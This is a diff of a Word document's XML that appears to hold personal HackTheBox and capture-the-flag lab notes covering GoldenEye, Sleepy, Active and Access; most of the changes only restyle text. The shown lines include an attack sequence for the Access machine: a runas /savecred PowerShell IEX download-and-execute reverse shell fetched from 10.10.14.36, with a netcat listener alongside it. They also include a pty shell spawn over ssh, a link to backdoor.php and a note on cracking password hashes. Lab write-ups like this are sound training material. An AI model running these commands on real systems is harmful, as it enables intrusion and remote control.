         <w:t>-Use hash killer for online password hacking and many other to check if the hash is well known or not</w:t>
       </w:r>
     </w:p>
@@ -222,17 +259,25 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="center"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:ascii="Carlito" w:hAnsi="Carlito"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b/>
           <w:b/>
           <w:bCs/>
           <w:kern w:val="0"/>
           <w:u w:val="single"/>
           <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:ascii="Carlito" w:hAnsi="Carlito"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:u w:val="single"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
         <w:t>GOLDEN EYE</w:t>
       </w:r>
     </w:p>
@@ -303,7 +348,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -406,7 +455,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -468,7 +521,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -500,7 +557,13 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="center"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:b/>
+          <w:b/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -515,7 +578,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -529,7 +596,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -543,7 +614,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -557,7 +632,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -571,7 +650,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -585,7 +668,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -599,7 +686,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -611,7 +700,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -623,7 +714,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -648,7 +741,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -660,7 +755,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -672,7 +769,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -686,20 +787,25 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
         <w:t>ssh mindy@192.168.110.140 "export TERM=xterm; python -c 'import pty; pty.spawn(\"/bin/bash\")'"</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -825,7 +931,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -864,14 +972,19 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="center"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+        <w:rPr>
+          <w:b/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="C9211E"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="C9211E"/>
+        </w:rPr>
         <w:t>Sleepy</w:t>
       </w:r>
     </w:p>
@@ -927,13 +1040,17 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="center"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+        <w:rPr>
+          <w:b/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>HackTheBox – Active – Windows</w:t>
       </w:r>
     </w:p>
@@ -1014,13 +1131,17 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+        <w:rPr>
+          <w:b/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>-SMBClient connect:</w:t>
       </w:r>
     </w:p>
@@ -1135,7 +1256,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1147,7 +1270,14 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1194,7 +1324,9 @@
       <w:pPr>
         <w:pStyle w:val="PreformattedText"/>
         <w:spacing w:before="0" w:after="160"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1216,7 +1348,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1388,7 +1522,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1413,7 +1549,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1501,13 +1639,17 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="center"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+        <w:rPr>
+          <w:b/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>HackTheBox – Access – Windows</w:t>
       </w:r>
     </w:p>
@@ -1540,7 +1682,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1552,7 +1696,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1639,7 +1785,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1689,9 +1837,10 @@
       <w:hyperlink r:id="rId2">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel1"/>
             <w:color w:val="auto"/>
             <w:highlight w:val="yellow"/>
+            <w:u w:val="single"/>
           </w:rPr>
           <w:t>http://10.10.14.36/Invoke-PowerShellTcp.ps1</w:t>
         </w:r>
@@ -1706,7 +1855,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1729,9 +1880,10 @@
       <w:hyperlink r:id="rId3">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel1"/>
             <w:color w:val="auto"/>
             <w:highlight w:val="yellow"/>
+            <w:u w:val="single"/>
           </w:rPr>
           <w:t>http://10.10.14.36/Invoke-PowerShellTcp.ps1</w:t>
         </w:r>
@@ -1746,7 +1898,14 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1781,7 +1940,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1936,8 +2097,9 @@
       <w:hyperlink r:id="rId5">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel2"/>
             <w:color w:val="auto"/>
+            <w:u w:val="single"/>
           </w:rPr>
           <w:t>http://10.10.14.36/Invoke-PowerShellTcp3.ps1</w:t>
         </w:r>
@@ -1988,14 +2150,19 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+        <w:rPr>
+          <w:b/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="C9211E"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="C9211E"/>
+        </w:rPr>
         <w:t>Note: When running the IEX to execute the shell, a netcat session should be listening with nc -nlvp 4444</w:t>
       </w:r>
     </w:p>
@@ -2012,12 +2179,14 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:highlight w:val="darkYellow"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="darkYellow"/>
+        </w:rPr>
         <w:t>runas /user:ACCESS\Administrator /savecred "powershell -C IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.36/Invoke-PowerShellTcp3.ps1')"</w:t>
       </w:r>
     </w:p>
@@ -2034,7 +2203,11 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="center"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2207,13 +2380,17 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+        <w:rPr>
+          <w:i/>
           <w:i/>
           <w:iCs/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
         <w:t>-1 is the algo used</w:t>
       </w:r>
     </w:p>
@@ -2221,7 +2398,14 @@
       <w:pPr>
         <w:pStyle w:val="PreformattedText"/>
         <w:spacing w:before="0" w:after="160"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="000000"/>
+          <w:highlight w:val="red"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2237,7 +2421,14 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="000000"/>
+          <w:highlight w:val="darkYellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2588,7 +2779,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2600,7 +2793,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2666,7 +2861,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2691,7 +2888,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2703,7 +2902,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2716,7 +2918,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2772,7 +2976,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2868,7 +3074,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2880,7 +3088,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2892,7 +3102,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2910,7 +3122,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2923,7 +3137,9 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="right"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2935,7 +3151,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2960,7 +3178,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2972,7 +3192,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2984,7 +3206,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:highlight w:val="red"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3068,7 +3293,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3080,7 +3307,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3101,7 +3330,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3173,7 +3404,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3233,7 +3466,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3371,7 +3606,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3520,7 +3757,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3650,7 +3889,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3662,7 +3903,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3674,7 +3917,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3686,7 +3931,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3698,7 +3945,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3930,8 +4179,10 @@
       <w:hyperlink r:id="rId7">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel3"/>
+            <w:color w:val="000080"/>
             <w:highlight w:val="yellow"/>
+            <w:u w:val="single"/>
           </w:rPr>
           <w:t>http://10.10.10.14</w:t>
         </w:r>
@@ -4132,8 +4383,10 @@
       <w:hyperlink r:id="rId8">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel3"/>
+            <w:color w:val="000080"/>
             <w:highlight w:val="yellow"/>
+            <w:u w:val="single"/>
           </w:rPr>
           <w:t>http://10.10.10.1</w:t>
         </w:r>
@@ -4190,7 +4443,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="darkYellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4234,7 +4489,9 @@
       <w:hyperlink r:id="rId9">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel4"/>
+            <w:color w:val="000080"/>
+            <w:u w:val="single"/>
           </w:rPr>
           <w:t>http://10.10.10.1</w:t>
         </w:r>
@@ -4324,7 +4581,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4392,7 +4651,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4404,7 +4665,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4851,7 +5115,9 @@
       <w:hyperlink r:id="rId10">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel4"/>
+            <w:color w:val="000080"/>
+            <w:u w:val="single"/>
           </w:rPr>
           <w:t>http://192.168.130.157/mailer/VERSION</w:t>
         </w:r>
@@ -4904,7 +5170,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4927,8 +5195,10 @@
       <w:hyperlink r:id="rId11">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel3"/>
+            <w:color w:val="000080"/>
             <w:highlight w:val="yellow"/>
+            <w:u w:val="single"/>
           </w:rPr>
           <w:t>http://192.168.130.157/contact</w:t>
         </w:r>
@@ -4943,7 +5213,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4955,7 +5227,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4967,7 +5241,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4979,7 +5255,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -5002,8 +5280,10 @@
       <w:hyperlink r:id="rId12">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel3"/>
+            <w:color w:val="000080"/>
             <w:highlight w:val="yellow"/>
+            <w:u w:val="single"/>
           </w:rPr>
           <w:t>http://192.168.130.157/</w:t>
         </w:r>
@@ -5011,8 +5291,10 @@
       <w:hyperlink r:id="rId13">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel3"/>
+            <w:color w:val="000080"/>
             <w:highlight w:val="yellow"/>
+            <w:u w:val="single"/>
           </w:rPr>
           <w:t>backdoor.php</w:t>
         </w:r>
@@ -5088,22 +5370,13 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+        <w:rPr>
+          <w:b/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="FF0000"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
-        <w:t>-find /root -type f 2&gt; /dev/null</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -5112,7 +5385,7 @@
           <w:color w:val="FF0000"/>
